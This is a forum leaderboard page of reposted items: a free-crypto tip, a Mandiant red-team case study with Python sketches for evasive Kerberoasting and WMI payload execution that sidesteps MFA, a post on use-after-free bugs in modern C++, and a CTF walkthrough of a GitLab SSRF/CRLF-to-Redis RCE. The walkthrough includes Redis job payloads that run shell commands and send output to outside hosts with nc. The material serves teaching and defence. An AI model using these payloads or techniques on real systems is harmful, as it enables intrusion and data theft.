
Leaderboard

Popular Content

Showing content with the highest reputation on 04/25/19 in all areas

  1. If you have a blockchain account and verify it (with an ID), you will receive/have already received some Stellar (XLM). If not, you can create an account here https://www.blockchain.com/getcrypto and after ID verification your account is credited with a somewhat random amount. Most people say they received the equivalent of 20-30 EUR. I received the equivalent of 45 EUR. The XLM can then be converted into ETH or BTC (or others) on sites like Binance or similar. Enjoy!
    3 points
  2. Finding Weaknesses Before the Attackers Do

April 08, 2019 | by Alyssa Rahman, Curtis Antolik | M-Trends, Red Teaming

This blog post originally appeared as an article in M-Trends 2019.

FireEye Mandiant red team consultants perform objectives-based assessments that emulate real cyber attacks by advanced and nation state attackers across the entire attack lifecycle, blending into environments and observing how employees interact with their workstations and applications. Assessments like this help organizations identify weaknesses in their current detection and response procedures so they can update their existing security programs to better deal with modern threats.

A financial services firm engaged a Mandiant red team to evaluate the effectiveness of its information security team's detection, prevention and response capabilities. The key objectives of this engagement were to accomplish the following actions without detection:

- Compromise Active Directory (AD): Gain domain administrator privileges within the client's Microsoft Windows AD environment.
- Access financial applications: Gain access to applications and servers containing financial transfer data and account management functionality.
- Bypass RSA Multi-Factor Authentication (MFA): Bypass MFA to access sensitive applications, such as the client's payment management system.
- Access ATM environment: Identify and access ATMs in a segmented portion of the internal network.

Initial Compromise

Based on Mandiant's investigative experience, social engineering has become the most common and efficient initial attack vector used by advanced attackers. For this engagement, the red team used a phone-based social engineering scenario to circumvent email detection capabilities and avoid the residual evidence that is often left behind by a phishing email.

While performing open-source intelligence (OSINT) reconnaissance of the client's Internet-facing infrastructure, the red team discovered an Outlook Web App login portal hosted at https://owa.customer.example. The red team registered a look-alike domain (https://owacustomer.example) and cloned the client's login portal (Figure 1).

Figure 1: Cloned Outlook Web Portal

After the OWA portal was cloned, the red team identified IT helpdesk and employee phone numbers through further OSINT. Once these phone numbers were gathered, the red team used a publicly available online service to call the employees while spoofing the phone number of the IT helpdesk. Mandiant consultants posed as helpdesk technicians and informed employees that their email inboxes had been migrated to a new company server. To complete the "migration," the employee would have to log into the cloned OWA portal. To avoid suspicion, employees were immediately redirected to the legitimate OWA portal once they authenticated. Using this campaign, the red team captured credentials from eight employees, which could be used to establish a foothold in the client's internal network.

Establishing a Foothold

Although the client's virtual private network (VPN) and Citrix web portals implemented MFA that required users to provide a password and RSA token code, the red team found a single-factor bring-your-own-device (BYOD) portal (Figure 2).

Figure 2: Single-factor mobile device management portal

Using stolen domain credentials, the red team logged into the BYOD web portal to attempt enrollment of an Android phone for CUSTOMER\user0. While the red team could view user settings, they were unable to add a new device.
To bypass this restriction, the consultants downloaded the IBM MaaS360 Android app and logged in via their phone. The device configuration process installed the client's VPN certificate (Figure 3), which was automatically imported to the Cisco AnyConnect app—also installed on the phone.

Figure 3: Setting up mobile device management

After launching the AnyConnect app, the red team confirmed the phone received an IP address on the client's VPN. Using a generic tethering app from the Google Play store, the red team then tethered a laptop to the phone to access the client's internal network.

Escalating Privileges

Once connected to the internal network, the red team used the Windows "runas" command to launch PowerShell as CUSTOMER\user0 and perform a "Kerberoast" attack. Kerberoasting abuses legitimate features of Active Directory to retrieve service accounts' ticket-granting service (TGS) tickets and brute-force accounts with weak passwords. To perform the attack, the red team queried an Active Directory domain controller for all accounts with a service principal name (SPN). The typical Kerberoast attack would then request a TGS for the SPN of each associated user account. While Kerberos ticket requests are common, the default Kerberoast attack tool generates an increased volume of requests, which is anomalous and could be identified as suspicious. Using a keyword search for terms such as "Admin", "SVC" and "SQL," the consultants identified 18 potentially high-value accounts. To avoid detection, the red team retrieved tickets for this targeted subset of accounts and inserted random delays between each request. The Kerberos tickets for these accounts were then uploaded to a Mandiant password-cracking server, which successfully brute-forced the passwords of 4 out of 18 accounts within 2.5 hours.

The red team then compiled a list of Active Directory group memberships for the cracked accounts, uncovering several groups that followed the naming scheme of {ComputerName}_Administrators. The red team confirmed the accounts possessed local administrator privileges to the specified computers by performing a remote directory listing of \\{ComputerName}\C$. The red team also executed commands on the systems using PowerShell Remoting to gain information about logged-on users and running software. After reviewing this data, the red team identified an endpoint detection and response (EDR) agent which had the capability to perform in-memory detections that were likely to identify and alert on the execution of suspicious command line arguments and parent/child process heuristics associated with credential theft.

To avoid detection, the red team created LSASS process memory dumps by using a custom utility executed via WMI. The red team retrieved the LSASS dump files over SMB and extracted cleartext passwords and NTLM hashes using Mimikatz. The red team performed this process on 10 unique systems identified to potentially have active privileged user sessions. From one of these 10 systems, the red team successfully obtained credentials for a member of the Domain Administrators group. With access to this Domain Administrator account, the red team gained full administrative rights for all systems and users in the customer's domain. This privileged account was then used to focus on accessing several high-priority applications and network segments to demonstrate the risk of such an attack on critical customer assets.
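As an aside, the targeted, low-and-slow Kerberoasting described above is easy to approximate with public tooling. Below is a minimal sketch (not the red team's actual utility) that requests tickets only for a hand-picked list of accounts and sleeps a random interval between requests, driving impacket's GetUserSPNs.py; the account names, credentials, DC address and delay window are all hypothetical:

import random
import subprocess
import time

# Hypothetical values, for illustration only
DC_IP = "10.1.2.3"
CREDS = "CUSTOMER/user0:Password1"
TARGETS = ["svc_sql01", "svc_backup", "admin_app"]  # keyword-filtered SPN accounts

for account in TARGETS:
    # Request a single TGS ticket and append the crackable hash to a file
    subprocess.run([
        "GetUserSPNs.py", CREDS,
        "-dc-ip", DC_IP,
        "-request-user", account,
        "-outputfile", "kerberoast.hashes",
    ], check=True)
    # Random delay so the request volume blends into normal Kerberos traffic
    time.sleep(random.uniform(60, 600))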
Accessing High-Value Objectives

For this phase, the client identified their RSA MFA systems, ATM network and high-value financial applications as three critical objectives for the Mandiant red team to target.

Targeting Financial Applications

The red team began this phase by querying Active Directory data for hostnames related to the objectives and found multiple servers and databases that included references to their key financial application. The red team reviewed the files and documentation on financial application web servers and found an authentication log indicating the following users accessed the financial application:

CUSTOMER\user1
CUSTOMER\user2
CUSTOMER\user3
CUSTOMER\user4

The red team navigated to the financial application's web interface (Figure 4) and found that authentication required an "RSA passcode," clearly indicating access required an MFA token.

Figure 4: Financial application login portal

Bypassing Multi-Factor Authentication

The red team targeted the client's RSA MFA implementation by searching network file shares for configuration files and IT documentation. In one file share (Figure 5), the red team discovered software migration log files that revealed the hostnames of three RSA servers.

Figure 5: RSA migration logs from \\CUSTOMER-FS01\Software

Next, the red team focused on identifying the user who installed the RSA authentication module. The red team performed a directory listing of the C:\Users and C:\data folders of the RSA servers, finding CUSTOMER\CUSTOMER_ADMIN10 had logged in the same day the RSA agent installer was downloaded. Using these indicators, the red team targeted CUSTOMER\CUSTOMER_ADMIN10 as a potential RSA administrator.

Figure 6: Directory listing output

By reviewing user details, the red team identified that the CUSTOMER\CUSTOMER_ADMIN10 account was actually the privileged account for the corresponding standard user account CUSTOMER\user103. The red team then used PowerView, an open source PowerShell tool, to identify systems in the environment where CUSTOMER\user103 was or had recently been logged in (Figure 7).

Figure 7: Running the PowerView Invoke-UserHunter command

The red team harvested credentials from the LSASS memory of 10.1.33.133 and successfully obtained the cleartext password for CUSTOMER\user103 (Figure 8).

Figure 8: Mimikatz output

The red team used the credential for CUSTOMER\user103 to log in, without MFA, to the web front-end of the RSA Security Console with administrative rights (Figure 9).

Figure 9: RSA console

Many organizations have audit procedures to monitor for the creation of new RSA tokens, so the red team decided the stealthiest approach would be to provision an emergency tokencode. However, since the client was using software tokens, the emergency tokens still required a user's RSA SecurID PIN. The red team decided to target individual users of the financial application and attempt to discover an RSA PIN stored on their workstation. While the red team knew which users could access the financial application, they did not know the system assigned to each user. To identify these systems, the red team targeted the users through their inboxes: the red team set a malicious Outlook homepage for the financial application user CUSTOMER\user1 through MAPI over HTTP using the Ruler utility. This ensured that whenever the user reopened Outlook on their system, a backdoor would launch.
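A quick aside on the file-share hunting step above (searching shares for RSA configuration files and migration logs): it can be approximated with a few lines of scripting. This is a hedged sketch using impacket's SMBConnection; the host, share, credentials and keywords are hypothetical, and recursion into subdirectories is omitted:

from impacket.smbconnection import SMBConnection

# Hypothetical values, for illustration only
HOST = "CUSTOMER-FS01"
SHARE = "Software"
KEYWORDS = ("rsa", "securid", "migration")

conn = SMBConnection(HOST, HOST)
conn.login("user0", "Password1", domain="CUSTOMER")

# List the top level of the share and flag interesting file names
for entry in conn.listPath(SHARE, "\\*"):
    name = entry.get_longname()
    if any(k in name.lower() for k in KEYWORDS):
        print(name, entry.get_filesize())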
Once CUSTOMER\user1 had re-launched Outlook and their workstation was compromised, the red team began enumerating installed programs on the system and identified that the target user used KeePass, a common password vaulting solution. The red team performed an attack against KeePass to retrieve the contents of the vault without having the master password, by adding a malicious event trigger to the KeePass configuration file (Figure 10). With this trigger, the next time the user opened KeePass, a comma-separated values (CSV) file was created with all passwords in the KeePass database, and the red team was able to retrieve the export from the user's roaming profile.

Figure 10: Malicious configuration file

One of the entries in the resulting CSV file was the login credentials for the financial application, which included not only the application password, but also the user's RSA SecurID PIN. With this information the red team possessed all the credentials needed to access the financial application.

The red team logged into the RSA Security Console as CUSTOMER\user103 and navigated to the user record for CUSTOMER\user1. The red team then generated an online emergency access token (Figure 11). The token was configured so that the next time CUSTOMER\user1 authenticated with their legitimate RSA SecurID PIN + tokencode, the emergency access code would be disabled. This was done to remain covert and mitigate any impact to the user's ability to conduct business.

Figure 11: Emergency access token

The red team then successfully authenticated to the financial application with the emergency access token (Figure 12).

Figure 12: Financial application accessed with emergency access token

Accessing ATMs

The red team's final objective was to access the ATM environment, located on a separate network segment from the primary corporate domain. First, the red team prepared a list of high-value users by querying the member list of potentially relevant groups such as ATM_Administrators. The red team then searched all accessible systems for recent logins by these targeted accounts and dumped their passwords from memory. After obtaining a password for ATM administrator CUSTOMER\ADMIN02, the red team logged into the client's internal Citrix portal to access the employee's desktop.

The red team reviewed the administrator's documentation and determined the client's ATMs could be accessed through a server named JUMPHOST01, which connected the corporate and ATM network segments. The red team also found a bookmark saved in Internet Explorer for "ATM Management." While this link could not be accessed directly from the Citrix desktop, the red team determined it would likely be accessible from JUMPHOST01. The jump server enforced MFA for users attempting to RDP into the system, so the red team used a previously compromised domain administrator account, CUSTOMER\ADMIN01, to execute a payload on JUMPHOST01 through WMI. WMI does not support MFA, so the red team was able to establish a connection between JUMPHOST01 and the red team's CnC server, create a SOCKS proxy, and access the ATM Management application without an RSA PIN. The red team successfully authenticated to the ATM Management application and could then dispense money, add local administrators, install new software and execute commands with SYSTEM privileges on all ATMs (Figure 13).

Figure 13: Executing commands on ATMs as SYSTEM
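The jump-server bypass above works because WMI authenticates with Windows credentials only and never consults the RSA agent guarding RDP. A minimal sketch of that remote-execution primitive with impacket, in the spirit of what wmiexec.py does (the host, credentials and payload path below are hypothetical):

from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dtypes import NULL

# Hypothetical values, for illustration only
dcom = DCOMConnection("JUMPHOST01", "ADMIN01", "Password1", "CUSTOMER")
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)

# Spawn the payload; no RSA token is ever requested on this code path
win32Process, _ = iWbemServices.GetObject('Win32_Process')
win32Process.Create('cmd.exe /c C:\\Windows\\Temp\\payload.exe', 'C:\\', None)
dcom.disconnect()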
Takeaways: Multi-Factor Authentication, Password Policy and Account Segmentation

Multi-Factor Authentication

Mandiant experts have seen a significant uptick in the number of clients securing their VPN or remote access infrastructure with MFA. However, there is frequently a lack of MFA for applications accessed from within the internal corporate network. Therefore, FireEye recommends that customers enforce MFA for all externally accessible login portals and for any sensitive internal applications.

Password Policy

During this engagement, the red team compromised four privileged service accounts due to the use of weak passwords which could be quickly brute-forced. FireEye recommends that customers enforce strong password practices for all accounts, with a minimum of 20-character passwords for service accounts. When possible, customers should also use Microsoft Managed Service Accounts (MSAs) or enterprise password vaulting solutions to manage privileged users.

Account Segmentation

Once the red team obtained initial access to the environment, they were able to escalate privileges in the domain quickly due to a lack of account segmentation. FireEye recommends customers follow the principle of least privilege when provisioning accounts. Accounts should be separated by role so normal users, administrative users and domain administrators are all unique accounts, even if a single employee needs one of each. Normal user accounts should not be given local administrator access without a documented business requirement. Workstation administrators should not be allowed to log in to servers and vice versa. Finally, domain administrators should only be permitted to log in to domain controllers, and server administrators should not have access to those systems. By segmenting accounts in this way, customers can greatly increase the difficulty of an attacker escalating privileges or moving laterally from a single compromised account.

Conclusion

As demonstrated in this case study, the Mandiant red team was able to gain a foothold in the client's environment, obtain full administrative control of the company domain and compromise all critical business applications without any software or operating system exploits. Instead, the red team focused on identifying system misconfigurations, conducting social engineering attacks and using the client's internal tools and documentation. The red team was able to achieve their objectives due to the configuration of the client's MFA, service account password policy and account segmentation.

Source: https://www.fireeye.com/blog/threat-research/2019/04/finding-weaknesses-before-the-attackers-do.html
    1 point
  3. Modern C++ Won't Save Us

2019-04-21 by alex_gaynor

I'm a frequent critic of memory unsafe languages, principally C and C++, and of how they induce an exceptional number of security vulnerabilities. My conclusion, based on reviewing evidence from numerous large software projects using C and C++, is that we need to be migrating our industry to memory safe by default languages (such as Rust and Swift). One of the responses I frequently receive is that the problem isn't C and C++ themselves, developers are simply holding them wrong. In particular, I often receive defenses of C++ of the form, "C++ is safe if you don't use any of the functionality inherited from C"[1] or similarly that if you use modern C++ types and idioms you will be immune from the memory corruption vulnerabilities that plague other projects.

I would like to credit C++'s smart pointer types, because they do significantly help. Unfortunately, my experience working on large C++ projects which use modern idioms is that these are not nearly sufficient to stop the flood of vulnerabilities. My goal for the remainder of this post is to highlight a number of completely modern C++ idioms which produce vulnerabilities.

Hide the reference use-after-free

The first example I'd like to describe, originally from Kostya Serebryany, is how C++'s std::string_view can make it easy to hide use-after-free vulnerabilities:

#include <iostream>
#include <string>
#include <string_view>

int main() {
  std::string s = "Hellooooooooooooooo ";
  std::string_view sv = s + "World\n";
  std::cout << sv;
}

What's happening here is that s + "World\n" allocates a new std::string, which is then converted to a std::string_view. At this point the temporary std::string is freed, but sv still points at the memory that used to be owned by it. Any future use of sv is a use-after-free vulnerability. Oops! C++ lacks the facilities for the compiler to be aware that sv captures a reference to something where the reference lives longer than the referent. The same issue impacts std::span, also an extremely modern C++ type.

Another fun variant involves using C++'s lambda support to hide a reference:

#include <memory>
#include <iostream>
#include <functional>

std::function<int(void)> f(std::shared_ptr<int> x) {
  return [&]() { return *x; };
}

int main() {
  std::function<int(void)> y(nullptr);
  {
    std::shared_ptr<int> x(std::make_shared<int>(4));
    y = f(x);
  }
  std::cout << y() << std::endl;
}

Here the [&] in f causes the lambda to capture values by reference. Then in main, x goes out of scope, destroying the last reference to the data and causing it to be freed. At this point y contains a dangling pointer. This occurs despite our meticulous use of smart pointers throughout. And yes, people really do write code that handles std::shared_ptr<T>&, often as an attempt to avoid additional increments and decrements on the reference count.

std::optional<T> dereference

std::optional represents a value that may or may not be present, often replacing magic sentinel values (such as -1 or nullptr). It offers methods such as value(), which extracts the T it contains and raises an exception if the optional is empty. However, it also defines operator* and operator->. These methods also provide access to the underlying T, but they do not check whether the optional actually contains a value.
The following code, for example, simply returns an uninitialized value:

#include <optional>

int f() {
  std::optional<int> x(std::nullopt);
  return *x;
}

If you use std::optional as a replacement for nullptr this can produce even more serious issues! Dereferencing a nullptr gives a segfault (which is not a security issue, except in older kernels). Dereferencing a nullopt, however, gives you an uninitialized value as a pointer, which can be a serious security issue. While having a T* with an uninitialized value is also possible, these are much less common than dereferencing a pointer that was correctly initialized to nullptr. And no, this doesn't require you to be using raw pointers. You can get uninitialized/wild pointers with smart pointers as well:

#include <optional>
#include <memory>

std::unique_ptr<int> f() {
  std::optional<std::unique_ptr<int>> x(std::nullopt);
  return std::move(*x);
}

std::span<T> indexing

std::span<T> provides an ergonomic way to pass around a reference to a contiguous slice of memory and a length. This lets you easily write code that works over multiple different types; a std::span<uint8_t> can point to memory owned by a std::vector<uint8_t>, a std::array<uint8_t, N>, or even a raw pointer. Failure to correctly check bounds is a frequent source of security vulnerabilities, and in many senses span helps out with this by ensuring you always have a length handy.

Like all STL data structures, span's operator[] method does not perform any bounds checks. This is regrettable, since operator[] is the most ergonomic and default way people use data structures. std::vector and std::array can at least theoretically be used safely because they offer an at() method which is bounds checked (in practice I've never seen this done, but you could imagine a project adopting a static analysis tool which simply banned calls to std::vector<T>::operator[]). span does not offer an at() method, or any other method which performs a bounds-checked lookup. Interestingly, both Firefox and Chromium's backports of std::span do perform bounds checks in operator[], and thus they'll never be able to safely migrate to std::span.

Conclusion

Modern C++ idioms introduce many changes which have the potential to improve security: smart pointers better express expected lifetimes, std::span ensures you always have a correct length handy, std::variant provides a safer abstraction for unions. However, modern C++ also introduces some incredible new sources of vulnerabilities: lambda capture use-after-free, uninitialized-value optionals, and un-bounds-checked span.

My professional experience writing relatively modern C++, and auditing Rust code (including Rust code that makes significant use of unsafe), is that the safety of modern C++ is simply no match for memory safe by default languages like Rust and Swift (or Python and JavaScript, though I find it rare in life to have a program that makes sense to write in either Python or C++). There are significant challenges to migrating existing, large, C and C++ codebases to a different language -- no one can deny this. Nonetheless, the question simply must be how we can accomplish it, rather than if we should try. Even with the most modern C++ idioms available, the evidence is clear that, at scale, it's simply not possible to hold C++ right.

[1] I understood this to be referring to raw pointers, arrays-as-pointers, manual malloc/free, and other similar features.
However, I think it's worth acknowledging that, given that C++ explicitly incorporated C into its specification, in practice most C++ code incorporates some of these elements.

Hi, I'm Alex. I'm currently at a startup called Alloy. Before that I was an engineer working on Firefox security, and before that at the U.S. Digital Service. I'm an avid open source contributor and live in Washington, DC.

Source: https://alexgaynor.net/2019/apr/21/modern-c++-wont-save-us/
    1 point
  4. GitLab 11.4.7 Remote Code Execution

21 Apr 2019 | Capture The Flag, Web Hacking, Exploit Walkthrough

TL;DR: SSRF targeting Redis for RCE via IPv6/IPv4 address embedding, chained with CRLF injection in the git:// protocol.

Video: watch on YouTube

Introduction

At the Real World CTF, we came across an interesting web challenge called flaglab. The description said "You might need a 0day", there was a link to the challenge, and there was a download link for a docker-compose.yml file. Upon visiting the challenge site, we are greeted by a GitLab instance. The docker-compose.yml file can be used to set up a local version of this very instance. Inside the docker-compose.yml, the docker image is set to gitlab/gitlab-ce:11.4.7-ce.0. Upon doing a Google search on the GitLab version, we stumbled upon a blog post on GitLab Patch Release, and it seemed like it was the latest version - the blog post was created on Nov 21, 2018 and the CTF was happening on Dec 1, 2018. So we thought we would never find an 0day in GitLab due to its huge codebase, and that it was just a waste of time... But as it turns out, we were wrong on these assumptions. During a post-CTF dinner with other teams, some people from RPISEC told us that it was not the latest version - there was a newer version, 11.4.8, and the commit history of the newer version reveals several security patches. One of the bugs was an "SSRF in Webhooks" and it was reported by nyangawa of Chaitin Tech (which is also the company that organized the Real World CTF). Knowing all this, it was actually a fairly simple challenge, and I was mad because we gave up without doing enough research. So after the event, I tried to solve this challenge with the knowledge gained so far.

Setup

Let's start setting up a local copy of the vulnerable version of GitLab. We can start by looking at the docker-compose.yml file.

web:
  image: 'gitlab/gitlab-ce:11.4.7-ce.0'
  restart: always
  hostname: 'gitlab.example.com'
  environment:
    GITLAB_OMNIBUS_CONFIG: |
      external_url 'http://gitlab.example.com'
      redis['bind']='127.0.0.1'
      redis['port']=6379
      gitlab_rails['initial_root_password']=File.read('/steg0_initial_root_password')
  ports:
    - '5080:80'
    - '50443:443'
    - '5022:22'
  volumes:
    - './srv/gitlab/config:/etc/gitlab'
    - './srv/gitlab/logs:/var/log/gitlab'
    - './srv/gitlab/data:/var/opt/gitlab'
    - './steg0_initial_root_password:/steg0_initial_root_password'
    - './flag:/flag:ro'

From the above YAML file, the following conclusions can be made:

- The docker image used is GitLab Community Edition 11.4.7 (gitlab-ce:11.4.7-ce.0).
- The Redis server runs on port 6379 and is listening on localhost.
- The Rails initial_root_password is set using a file called steg0_initial_root_password.
- There are some ports mapped from the docker container to our machine, which exposes the application outside the container for us to fiddle with. We'll be using the HTTP service running on port 5080.
- Additionally, there are volumes, which mount local files and folders inside the docker container. For example, ./srv/gitlab/logs on our machine will be mounted to /var/log/gitlab inside the docker container. The password file and the flag are also copied into the container.

You can create these required files and folders using the following commands:

# Create required folders for the gitlab logs, data and configs. Leave them empty.
mkdir -p ./srv/gitlab/config ./srv/gitlab/data ./srv/gitlab/logs

# Create a random password using python
python3 -c "import secrets; print(secrets.token_urlsafe(16))" > ./steg0_initial_root_password
# ==OR== choose your own password
echo "my_sup3r_s3cr3t_p455w0rd_4ef5a2e1" > ./steg0_initial_root_password

# Create a test flag
echo "RWCTF{this_is_flaglab_flag}" > ./flag

Now that we have the required files and folders, we can start the docker container using the following command.

$ docker-compose up

The process of downloading the base image and building the GitLab instance might take a few minutes. After you start seeing some logs, you should be able to browse to http://127.0.0.1:5080/ for the vulnerable GitLab version. Now it's time to configure the Chrome browser to use a proxy. You can do it manually by going to the settings and changing it there, or you can do it via the command line, which is a bit handier.

/path/to/chrome --proxy-server="127.0.0.1:8080" --profile-directory=Proxy --proxy-bypass-list=""

I had problems with the Burp Suite proxy not being able to intercept the localhost requests even with the bypass list being empty. So a quick workaround was to add an entry in the hosts file like the following.

127.0.0.1 localhost.com

Browsing to http://localhost.com:5080 now lets us access GitLab through the Burp Suite proxy. That's all for the setup!

The Bugs

As you already know, we thought that 11.4.7 was the latest version of GitLab at that time, but in fact there was a newer version, 11.4.8, which had many security patches in the commits. One of the bugs was related to SSRF, and it even referenced Chaitin Tech, which is the company responsible for hosting the Real World CTF. Additionally, we also know that the flag file is located in / (the root of the file system), so we need an Arbitrary File Read or a Remote Code Execution vulnerability. Now let's have a look at those patches for SSRF and other potential bugs. At the top, you'll find 3 security related commits. There's our SSRF in Webhooks; we also have an XSS, which is rather uninteresting for us; and finally, we have a CRLF injection (Carriage-Return/Line-Feed), which is basically a newline injection. If we look at the fix for the SSRF issue and scroll down a bit, you'll see that there are unit tests to confirm the fix for the issue. These tests tell us how to exploit the bug, which is exactly what we wanted. Looking at some test cases, apparently special IPv6 addresses which have an IPv4 address embedded inside them can bypass the SSRF checks.

# SSRF protection bypass
https://[0:0:0:0:0:ffff:127.0.0.1]

The other issue was a CRLF vulnerability in Project hooks; scrolling down to the test cases, you can see it's merely URLs with newlines - either URL encoded, or simply regular newlines. Now the question is, can these bugs help us in exploiting GitLab to get the flag? Yes, they can. By chaining these 2 bugs, we can get a Remote Code Execution. It's actually a typical security issue. Basically, an SSRF or Server Side Request Forgery is used to target the local internal Redis database, which is used extensively for different types of workers. So if you can push a malicious worker, you might end up with a Remote Code Execution vulnerability. In fact, GitLab has been exploited like this several times before, and there are many bug bounty writeups which are similar to this.
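Before moving on, a quick aside on why the embedded-IPv4 notation slips past a naive blocklist. Here is a small illustration (not GitLab's actual validation code) using Python's standard ipaddress module:

import ipaddress

# The address from the bypass test case
addr = ipaddress.ip_address("0:0:0:0:0:ffff:127.0.0.1")
print(addr)               # ::ffff:7f00:1  -> parsed as an IPv6 address
print(addr.ipv4_mapped)   # 127.0.0.1     -> what the socket layer actually reaches

# A check comparing against the literal loopback address never fires
print(addr == ipaddress.ip_address("127.0.0.1"))  # False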
I don't remember where I first came across this technique, but I believe it was @Agarri_FR who tweeted about it back in 2015, and there was also a blog post by him from 2014. I have since come across many bug bounty writeups about it, so everyone who's into web security should know about this.

Exploitation

Now onto the fun stuff. First, let's see if we can trigger an SSRF somewhere. At first, I thought about targeting the Webhooks (used to send requests to a URL whenever any events are fired in the repository) like it's mentioned here. However, when I clicked on "create a new project", I saw multiple ways to import a project, and one of them was "Repo by URL", which would basically fetch the repo when you specify a URL. We can import a repo over http://, https:// and git://. So to test this, we can try to import the repo using the following URL.

http://127.0.0.1/test/somerepo.git

But we'd get the error that "Import URL is blocked: Requests to localhost are not allowed". Now, we can try the bypass using the special IPv6 address, replacing the import URL with the following.

http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git

Before importing using this URL, we need a server listening on port 1234 to confirm the SSRF. To do that, we can get a root shell on the docker container to install netcat and then listen on port 1234 to see if the SSRF is triggered. First, let's go ahead and list all the running Docker containers to know which one to get a shell on.

# get a list of running docker containers
$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS NAMES
bd9daf8c07a6 gitlab/gitlab-ce:11.4.7-ce.0 ... ... ... ...

We just have one running, and it's the GitLab 11.4.7. We can get a shell on the container using the following command by specifying the container ID.

$ docker exec -i -t bd9daf8c07a6 "/bin/bash"

Here, bd9daf8c07a6 is the container ID, -i means interact with /bin/bash, and -t means create a tty - a pseudo terminal for the interaction. Now that we have the shell, we can install netcat so that we can set up a simple server to listen for incoming SSRF requests.

root@gitlab:~ apt update && apt install -y netcat

Setting up a raw TCP server is as simple as the following command.

root@gitlab:~ nc -lvp 1234

Here, -l tells netcat to listen, -v is for verbose output, and -p specifies the port number the server has to bind to. Now that we have our SSRF testing setup done, let's make the same import request to see if we can trigger the SSRF. Additionally, instead of specifying the URL from the web application in the browser, we can use Burp Suite's Repeater to quickly modify the HTTP request to our needs and send it away. To do this, we can modify the old "Repo by URL" request: update the URL to http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git and the name of the project to something that isn't already there, and send the request. As you can see from the above image, we did get the request trapped in our netcat listener. This confirms that the SSRF can talk to internal services - in our case the local netcat server on port 1234 - which means that we can also talk to the internal Redis server running on port 6379 (specified in the docker-compose.yml). But what is Redis and how does GitLab use it? Redis is an in-memory data structure store, used as a database, cache and message broker. GitLab uses it in different ways, like storing session data, caching, and even background job queues.
Redis uses a straightforward, plain text protocol, which means you can directly connect to Redis using netcat and start messing around.

# quick test with redis
root@gitlab:~ nc 127.0.0.1 6379
blah
- ERR unknown command 'blah'
set liveoverflow test
+OK
asd
- ERR unknown command 'asd'
get liveoverflow
$4
test

Redis is a simple ASCII text-based protocol, but HTTP is also a simple ASCII text-based protocol. Now, what would happen if we sent an HTTP request to Redis? Would Redis execute the commands? Let's try.

# http request test with redis
root@gitlab:~ nc 127.0.0.1 6379
GET /test/ssrf.git/info/refs?service=git-upload-pack HTTP/1.1
Host: [0:0:0:0:0:ffff:127.0.0.1]:1234
User-Agent: git/2.18.1
Accept: */*
Accept-Encoding: deflate, gzip
Pragma: no-cache
- Err wrong number of arguments for 'get' command
root@gitlab:~

It gives us an error saying that there is a wrong number of arguments for the 'get' command, which makes sense because from the earlier example we know how the 'get' command in Redis works. But then we were dropped back to the shell; however, from earlier we saw that Redis doesn't quit even when there are errors, so what is actually going on? Pasting the raw HTTP protocol data line by line gives us the answer. The second line, Host: [0:0:0:0:0:ffff:127.0.0.1]:1234, is responsible for Redis terminating the connection unexpectedly. This happens because SSRF to Redis is a huge issue, and Redis has implemented a "fix" for it: if the string "Host:" is presented to the Redis server as a command, it knows that this is an HTTP request trying to smuggle some Redis commands, and it stops the execution by closing the connection. If only we could get our payload in between the first line (GET /test...) and the second (Host: ...), we could make this work. Since we control the first line of the HTTP request, can we inject some newlines and add more commands? *cough* CRLF *cough* Yes - remember the CRLF injection bug we saw in the Security Release and the commit history? We can use that! From the commit history's test cases, we can see that the injection is pretty straightforward: merely adding newlines, or URL encoding them, would do the trick. For example:

http://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git
# Expected to be converted to
http://127.0.0.1:333/
test
blah.git

However, this didn't work out. Not sure why, but changing the protocol from http:// to git:// makes it work.

# Does work :)
git://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git
# Expected to be converted to
git://127.0.0.1:333/
test
blah.git

Now that we know what Redis is, where it's being used, and how we can add newlines using the CRLF injection, we can move on to creating a payload for the RCE. The idea is to talk to this internal Redis server by using the SSRF vulnerability, smuggling one protocol (Redis) inside another (git://), and get Remote Code Execution. Fortunately, @jobertabma has already figured out the payload. Let's have a look at it.

multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec

As you know, Redis can also be used for background job queues. These jobs are handled by Sidekiq, which is a background task processor for Ruby. We can look at the list of Sidekiq queues to see if there's anything that we can use.
...
- [default, 1]
- [pages, 1]
- [system_hook_push, 1]
- [propagate_service_template, 1]
- [background_migration, 1]
...

There's system_hook_push, which can be used to handle new jobs, and it's the same one being used in the actual payload. Now, to execute code/commands, we need a class that would do it for us - think of this as a gadget. Fortunately, Jobert has also found the right class: gitlab_shell_worker.rb.

class GitlabShellWorker
  include ApplicationWorker
  include Gitlab::ShellAdapter

  def perform(action, *arg)
    gitlab_shell.__send__(action, *arg) # rubocop:disable GitlabSecurity/PublicSend
  end
end

As you can see, this is exactly the class we've been looking for. This GitlabShellWorker is called with some arguments like class_eval and the actual command that needs to be executed, which in our case is the following.

open('| COMMAND_TO_BE_EXECUTED').read

In the actual payload, we push the job onto the system_hook_push queue and get the GitlabShellWorker class to run our commands. Now that we have everything we need for the exploitation, we can craft the final payload and send it over. Before doing that, I need to set up a netcat listener on our main machine (192.168.178.21) to receive the flag.

$ nc -lvp 1234

The final payload looks like the following.

multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'| cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec

Some points to note:

- In the payload above, every Redis command line needs a leading whitespace - no clue why.
